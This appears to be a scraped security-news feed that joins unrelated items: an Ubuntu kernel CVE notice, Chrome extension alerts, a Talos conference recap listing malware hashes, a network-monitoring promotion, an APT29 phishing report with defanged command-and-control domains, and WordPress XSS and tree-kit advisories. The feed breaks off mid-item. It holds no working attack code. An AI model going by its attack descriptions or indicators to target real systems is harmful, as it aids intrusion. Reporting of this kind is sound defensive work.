Ubuntu Security Notice 6300-1 - William Zhao discovered that the Traffic Control subsystem in the Linux kernel did not properly handle network packet retransmission in certain situations. A local attacker could use this to cause a denial of service. It was discovered that the NTFS file system implementation in the Linux kernel did not properly check buffer indexes in certain situations, leading to an out-of-bounds read vulnerability. A local attacker could possibly use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6300-1  
August 17, 2023

linux, linux-aws, linux-aws-5.15, linux-gcp, linux-hwe-5.15, linux-ibm,  
linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,  
linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15,  
linux-raspi vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-kvm: Linux kernel for cloud environments  
- linux-lowlatency: Linux low latency kernel  
- linux-nvidia: Linux kernel for NVIDIA systems  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems  
- linux-hwe-5.15: Linux hardware enablement (HWE) kernel  
- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms  
- linux-lowlatency-hwe-5.15: Linux low latency kernel  
- linux-oracle-5.15: Linux kernel for Oracle Cloud systems

Details:

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly check buffer indexes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2022-48502)

Seth Jenkins discovered that the Linux kernel did not properly perform  
address randomization for a per-cpu memory management structure. A local  
attacker could use this to expose sensitive information (kernel memory)  
or in conjunction with another kernel vulnerability. (CVE-2023-0597)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

Ruihan Li discovered that the bluetooth subsystem in the Linux kernel did  
not properly perform permissions checks when handling HCI sockets. A  
physically proximate attacker could use this to cause a denial of service  
(bluetooth communication). (CVE-2023-2002)

It was discovered that the XFS file system implementation in the Linux  
kernel did not properly perform metadata validation when mounting certain  
images. An attacker could use this to specially craft a file system image  
that, when mounted, could cause a denial of service (system crash).  
(CVE-2023-2124)

Juan Jose Lopez Jaimez, Meador Inge, Simon Scannell, and Nenad Stojanovski  
discovered that the BPF verifier in the Linux kernel did not properly mark  
registers for precision tracking in certain situations, leading to an out-  
of-bounds access vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-2163)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that the perf subsystem in the Linux kernel contained a  
use-after-free vulnerability. A privileged local attacker could possibly  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-2235)

Zheng Zhang discovered that the device-mapper implementation in the Linux  
kernel did not properly handle locking during table_clear() operations. A  
local attacker could use this to cause a denial of service (kernel  
deadlock). (CVE-2023-2269)

It was discovered that the ARM Mali Display Processor driver implementation  
in the Linux kernel did not properly handle certain error conditions. A  
local attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2023-23004)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the Ricoh R5C592 MemoryStick card reader driver in  
the Linux kernel contained a race condition during module unload, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3141)

Quentin Minster discovered that the KSMBD implementation in the Linux  
kernel did not properly validate pointers in some situations, leading to a  
null pointer dereference vulnerability. A remote attacker could use this to  
cause a denial of service (system crash). (CVE-2023-32248)

It was discovered that the kernel->user space relay implementation in the  
Linux kernel did not properly perform certain buffer calculations, leading  
to an out-of-bounds read vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or expose sensitive information  
(kernel memory). (CVE-2023-3268)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

It was discovered that the BQ24190 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33288)

It was discovered that the video4linux driver for Philips based TV cards in  
the Linux kernel contained a race condition during device removal, leading  
to a use-after-free vulnerability. A physically proximate attacker could  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-35823)

It was discovered that the SDMC DM1105 PCI device driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A physically proximate attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-35824)

It was discovered that the Renesas USB controller driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-35828)

It was discovered that the Rockchip Video Decoder IP driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-35829)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1030-nvidia  5.15.0-1030.30  
   linux-image-5.15.0-1030-nvidia-lowlatency  5.15.0-1030.30  
   linux-image-5.15.0-1035-ibm     5.15.0-1035.38  
   linux-image-5.15.0-1035-raspi   5.15.0-1035.38  
   linux-image-5.15.0-1037-intel-iotg  5.15.0-1037.42  
   linux-image-5.15.0-1039-gcp     5.15.0-1039.47  
   linux-image-5.15.0-1039-kvm     5.15.0-1039.44  
   linux-image-5.15.0-1040-oracle  5.15.0-1040.46  
   linux-image-5.15.0-1042-aws     5.15.0-1042.47  
   linux-image-5.15.0-79-generic   5.15.0-79.86  
   linux-image-5.15.0-79-generic-64k  5.15.0-79.86  
   linux-image-5.15.0-79-generic-lpae  5.15.0-79.86  
   linux-image-5.15.0-79-lowlatency  5.15.0-79.88  
   linux-image-5.15.0-79-lowlatency-64k  5.15.0-79.88  
   linux-image-aws-lts-22.04       5.15.0.1042.41  
   linux-image-gcp-lts-22.04       5.15.0.1039.35  
   linux-image-generic             5.15.0.79.76  
   linux-image-generic-64k         5.15.0.79.76  
   linux-image-generic-lpae        5.15.0.79.76  
   linux-image-ibm                 5.15.0.1035.31  
   linux-image-intel-iotg          5.15.0.1037.36  
   linux-image-kvm                 5.15.0.1039.35  
   linux-image-lowlatency          5.15.0.79.83  
   linux-image-lowlatency-64k      5.15.0.79.83  
   linux-image-nvidia              5.15.0.1030.30  
   linux-image-nvidia-lowlatency   5.15.0.1030.30  
   linux-image-oracle              5.15.0.1040.35  
   linux-image-raspi               5.15.0.1035.33  
   linux-image-raspi-nolpae        5.15.0.1035.33  
   linux-image-virtual             5.15.0.79.76

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1037-intel-iotg  5.15.0-1037.42~20.04.1  
   linux-image-5.15.0-1040-oracle  5.15.0-1040.46~20.04.1  
   linux-image-5.15.0-1041-aws     5.15.0-1041.46~20.04.1  
   linux-image-5.15.0-79-generic   5.15.0-79.86~20.04.2  
   linux-image-5.15.0-79-generic-64k  5.15.0-79.86~20.04.2  
   linux-image-5.15.0-79-generic-lpae  5.15.0-79.86~20.04.2  
   linux-image-5.15.0-79-lowlatency  5.15.0-79.88~20.04.1  
   linux-image-5.15.0-79-lowlatency-64k  5.15.0-79.88~20.04.1  
   linux-image-aws                 5.15.0.1041.46~20.04.30  
   linux-image-generic-64k-hwe-20.04  5.15.0.79.86~20.04.39  
   linux-image-generic-hwe-20.04   5.15.0.79.86~20.04.39  
   linux-image-generic-lpae-hwe-20.04  5.15.0.79.86~20.04.39  
   linux-image-intel               5.15.0.1037.42~20.04.27  
   linux-image-intel-iotg          5.15.0.1037.42~20.04.27  
   linux-image-lowlatency-64k-hwe-20.04  5.15.0.79.88~20.04.36  
   linux-image-lowlatency-hwe-20.04  5.15.0.79.88~20.04.36  
   linux-image-oem-20.04           5.15.0.79.86~20.04.39  
   linux-image-oem-20.04b          5.15.0.79.86~20.04.39  
   linux-image-oem-20.04c          5.15.0.79.86~20.04.39  
   linux-image-oem-20.04d          5.15.0.79.86~20.04.39  
   linux-image-oracle              5.15.0.1040.46~20.04.1  
   linux-image-virtual-hwe-20.04   5.15.0.79.86~20.04.39

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6300-1  
   CVE-2022-4269, CVE-2022-48502, CVE-2023-0597, CVE-2023-1611,  
   CVE-2023-1855, CVE-2023-1990, CVE-2023-2002, CVE-2023-2124,  
   CVE-2023-2163, CVE-2023-2194, CVE-2023-2235, CVE-2023-2269,  
   CVE-2023-23004, CVE-2023-28466, CVE-2023-30772, CVE-2023-3141,  
   CVE-2023-32248, CVE-2023-3268, CVE-2023-33203, CVE-2023-33288,  
   CVE-2023-35823, CVE-2023-35824, CVE-2023-35828, CVE-2023-35829

Package Information:  
   https://launchpad.net/ubuntu/+source/linux/5.15.0-79.86  
   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1042.47  
   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1039.47  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1035.38  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1037.42  
   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1039.44  
   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-79.88  
   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1030.30  
   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1040.46  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1035.38  
   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1041.46~20.04.1  
   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-79.86~20.04.2

 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1037.42~20.04.1

 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-79.88~20.04.1

 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1040.46~20.04.1

Ubuntu Security Notice USN-6300-1

Google has announced plans to add a new feature in the upcoming version of its Chrome web browser to alert users when an extension they have installed has been removed from the Chrome Web Store.
The feature, set for release alongside Chrome 117, allows users to be notified when an add-on has been unpublished by a developer, taken down for violating Chrome Web Store policy, or marked as malware.

Browser Security / Malware

Google has announced plans to add a new feature in the upcoming version of its Chrome web browser to alert users when an extension they have installed has been removed from the Chrome Web Store.

The feature, set for release alongside Chrome 117, allows users to be notified when an add-on has been unpublished by a developer, taken down for violating Chrome Web Store policy, or marked as malware.

The tech giant said it intends to highlight such extensions under a "Safety check" category in the "Privacy and security" section of the browser settings page.

"When a user clicks 'Review,' they will be taken to their extensions and given the choice to either remove the extension or hide the warning if they wish to keep the extension installed," Oliver Dunk, a developer relations engineer for Chrome extensions, said.

"As in previous versions of Chrome, extensions marked as malware are automatically disabled."

The development comes as the company said it's going to automatically upgrade all https:// URL navigations to https:// even when users click on a link that explicitly declares https://. The feature is currently being tested in Chrome 115, and is expected to be rolled out soon.

Google also said it will also show a warning starting in mid-September 2023 when users attempt to download high-risk files while on an insecure connection.

"Downloaded files can contain malicious code that bypasses Chrome's sandbox and other protections, so a network attacker has a unique opportunity to compromise your computer when insecure downloads happen," the Chromium team said.

"Unless HTTPS-First Mode is enabled, Chrome will not show warnings when insecurely downloading files like images, audio, or video, as these file types are relatively safe."

Some of the other features that are in the pipeline include enabling HTTPS-First Mode by default in Incognito Mode for a more secure browsing experience and automatically turning the setting on for users who rarely use HTTP.

Users can enable HTTPS-First Mode by enabling "Always use secure connections" in Chrome security settings (chrome://settings/security).

The updates also follow Google's proposals to add support for quantum-resistant encryption algorithms in the Chrome browser, starting with version 116.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions

Unsurprisingly, it seems like AI was the talk of the town.

Thursday, August 17, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)

But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend BlackHat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.

Unsurprisingly, it seems like AI was the talk of the town. One panel, which featured the former Cyber Czar in the Obama administration, promised coming action from the Biden administration around AI and its intersection with cybersecurity, including an executive order that apparently will be as broad as earlier orders around the U.S.’ broader approach to security.

There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like.

I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.

Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ‘ol fashioned video game beef.

The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.

I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.

I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.

And there was the brief, but confusing, saga at DEFCON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.

Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say “Hi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at BlackHat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.

**The one big thing**

Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around tehse tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our “On the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.

**Why do I care?**

AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.

**So now what?**

There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.

**Top security headlines of the week**

**Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years.** The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, “Strenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)

Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that **his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors.** Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)

**Several years’ worth of Intel chips contains a newly discovered flaw known as “Downfall,”** which is like the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to “unintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)

**Can’t get enough Talos?**

*   Cisco XDR: from detection and response to continuity after a cyberattack
*   As Ransomware Gangs Shift To Data Extortion, Some Adopt A New Tactic: ‘Customer Service’
*   Talos Takes Ep. #150: What's the difference between data theft extortion and ransomware?

**Upcoming events where you can find Talos**

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!Mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

Recapping the top stories from Black Hat and DEF CON

Changes in the way we work have had significant implications for cybersecurity, not least in network monitoring. Workers no longer sit safely side-by-side on a corporate network, dev teams constantly spin up and tear down systems, exposing services to the internet. Keeping track of these users, changes and services is difficult – internet-facing attack surfaces rarely stay the same for long.
But

Changes in the way we work have had significant implications for cybersecurity, not least in network monitoring. Workers no longer sit safely side-by-side on a corporate network, dev teams constantly spin up and tear down systems, exposing services to the internet. Keeping track of these users, changes and services is difficult – internet-facing attack surfaces rarely stay the same for long.

But a secure working network is the backbone of every modern business, and with so many different attack vectors and entry points, relying on firewalls and point-in-time scanning is no longer enough. You need to understand how your firewalls are being changed in real-time, with real-world validation of how they're configured. You need continuous network monitoring.

****What needs protecting in your network?****

There is so much sprawl in today's corporate networks with remote working, cloud computing and third-party integrations, that it's no longer just the devices or systems that you have in your office and data center that need protecting.

From the hardware and software of the network itself, to all the devices used to access it, from IoT endpoints to laptops and smartphones, network security now needs to look beyond the perimeter to your cloud resources, edge devices, third-party hosted content, integrations with other hardware or software, and assets hosted in dispersed offices.

Just to complicate matters further, some of these services, especially those hosted in the cloud, may only be active for a short space of time for specific projects, events, deployments, or by design. With such a dispersed network, the castle-and-moat model of network security is no longer fit for purpose.

****What can go wrong with your network?****

Vulnerabilities can be introduced to your network in a number of ways, including misconfigurations, expiring certificates, new assets added to cloud environments, missing patches, or unnecessarily exposing services to the internet. In addition, there's the ever-present risk of attack from phishing, supply chain compromises and exposed credentials.

For example, a Windows SMB service on your internal network is not a vulnerability, but exposing one to the internet is a different matter entirely – that's what led to the WannaCry ransomware attack that spread across the world. Similarly, Australian telco Optus suffered a devastating data breach in 2022 that exposed details of 11 million customers. The breach occurred through an unprotected and publicly-exposed API which didn't require user authentication, so anyone that discovered the API on the internet could connect to it without a username or password.

****How can you protect your network?****

Continuous network monitoring supported by regular scanning could have picked up both of these vulnerabilities and prevented these breaches. Monitoring uses automation to detect and identify flaws and weak spots in your devices, application software and operating systems. It does this by sending probes to look for open ports and services, and once the list of services is discovered, probing each for more information, configuration weaknesses or known vulnerabilities.

It's common to have a range of systems in your network, from laptops and workstations in the office or at home, to systems in cloud platforms like AWS, Azure, and Google Cloud. Your team may well use a range of operating systems too. Deciding what to include in your network scan can be hard, but there are multiple ways to tackle it: exposure based, sensitivity based and coverage based.

****‍Why do you need to monitor continuously?****

Your network is always changing. New services are spun up, web apps updated, permissions changed, devices added and removed. All of these can introduce potential vulnerabilities. The goal of continuous monitoring is to provide near-immediate feedback and insight into these changes, assessing and prioritizing vulnerabilities, so you can understand the risk across your entire infrastructure.

With this clear picture of what attackers can see and what's accessible in your internet-facing infrastructure, you can easily tackle any problems as soon as they arise. Continuous monitoring not only provides visibility into the vulnerabilities in your IT environment and remote devices, but also clarity into how those vulnerabilities translate into business risk, and which are most likely to be targeted by attackers.

****Continuous network monitoring with Intruder****

**Advanced network monitoring** tools like Intruder run daily network scans so your network view is always accurate and up to date – showing active and unresponsive targets, any changes since your last scan, expiring certificates, and the ports and services you expect – and more importantly, don't expect – to be exposed to the internet.

Intruder gives you a real view of your attack surface combining continuous network monitoring, automated vulnerability scanning, and proactive threat response in one platform.

Any targets you add will kick off a scan. Once finished, it adds the target to the queue for rescanning at regular intervals. Any changes will automatically kick off a vulnerability scan, with issues prioritized by context so you can fix what matters most.

If you're lucky enough to have your own network range, you know how useful it can be but how hard to manage. You want to make sure your whole range is covered, but licensing vast numbers of inactive IPs can be expensive. Intruder monitors your external network ranges for active IPs – but you'll only pay for the ones in use.

This continuous monitoring gives comprehensive and up-to-date visibility across your entire IT environment to take your network security to another level.

**_Visit Intruder to activate a_** **_free 14-day trial_** **_and experience continuous network monitoring for yourself._**

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Why You Need Continuous Network Monitoring?

An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors.
The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock,

Cyber Espionage / Malware

An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors.

The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to **APT29** (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes).

"The threat actor used Zulip – an open-source chat application – for command-and-control, to evade and hide its activities behind legitimate web traffic," Dutch cybersecurity company EclecticIQ said in an analysis last week.

The infection sequence is as follows: The PDF attachment, named "Farewell to Ambassador of Germany," comes embedded with JavaScript code that initiates a multi-stage process to drop the malware.

APT29's use of invitation themes has been previously reported by Lab52, which documented an attack that impersonates the Norwegian embassy to deliver a DLL payload that's capable of contacting a remote server to fetch additional payloads.

The use of the domain "bahamas.gov\[.\]bs" in both the intrusion sets further solidifies this link.

Should a potential target succumb to the phishing trap by opening the PDF file, a malicious HTML dropper called Invitation\_Farewell\_DE\_EMB is launched to execute JavaScript that drops a ZIP archive file, which, in turn, packs in an HTML Application (HTA) file designed to deploy the Duke malware.

Command-and-control is facilitated by making use of Zulip's API to send victim details to an actor-controlled chat room (toyy.zulipchat\[.\]com) as well as to remotely commandeer the compromised hosts.

EclecticIQ said it identified a second PDF file, likely used by APT29 for reconnaissance or for testing purposes.

"It did not contain a payload, but notified the actor if a victim opened the email attachment by receiving a notification through a compromised domain edenparkweddings\[.\]com," the researchers said.

It's worth noting that the abuse of Zulip is par for the course with the state-sponsored group, which has a track record of leveraging a wide array of legitimate internet services such as Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, and Trello for C2.

APT29's primary targets are governments and government subcontractors, political organizations, research firms, and critical industries in the U.S. and Europe. But in an interesting twist, an unknown adversary has been observed employing its tactics to breach Chinese-speaking users with Cobalt Strike.

The development comes as the Computer Emergency Response Team of Ukraine (CERT-UA) warned of a new set of phishing attacks against state organizations of Ukraine using a Go-based open-source post-exploitation toolkit called Merlin. The activity is being tracked under the moniker UAC-0154.

The war-torn country has also faced sustained cyber assaults from Sandworm, an elite hacking unit affiliated to Russian military intelligence, primarily intended to disrupt critical operations and gather intelligence to gain a strategic advantage.

According to a recent report from the Security Service of Ukraine (SBU), the threat actor is said to have unsuccessfully attempted to gain unauthorized access to Android tablets possessed by Ukrainian military personnel for planning and performing combat missions.

"The capture of devices on the battlefield, their detailed examination, and the use of available access, and software became the primary vector for the initial access and malware distribution," the security agency said.

Some of the malware strains include NETD to ensure persistence, DROPBEAR to establish remote access, STL to gather data from the Starlink satellite system, DEBLIND to exfiltrate data, the Mirai botnet malware. Also used in the attacks is a TOR hidden service to access the device on the local network via the Internet.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Use Zulip Chat App for Covert C&C in Diplomatic Phishing Attacks

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Maxim Glazunov XML for Google Merchant Center plugin <= 3.0.1 versions.

**Solution**

 Fixed

Update the WordPress XML for Google Merchant Center plugin to the latest available version (at least 3.0.2).

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress XML for Google Merchant Center Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 3.0.2.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30877: WordPress XML for Google Merchant Center plugin <= 3.0.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

A Prototype Pollution issue in Cronvel Tree-kit v.0.7.4 and before allows a remote attacker to execute arbitrary code via the extend function.

The maintainers have already released an update fixing the issue. Versions before 0.7.5 are affected and thus vulnerable to Prototype Pollution. We strongly recommend that impacted users upgrade to the newer version that includes the fixes, i.e., version 0.7.5 and above.We have found a new Prototype Pollution vulnerability in the JavaScript package tree-kit in all versions before 0.7.5. The maintainer of tree-kit has released an update that fixed the issue on 21 July 2023. The vulnerability was discovered by Peter Samarin using Jazzer.js with our newly integrated Prototype Pollution bug detector. This finding emerged in part from our collaboration with Google's OSS-Fuzz and puts affected applications at risk of remote code execution and denial of service attacks.

**Vulnerability Description**

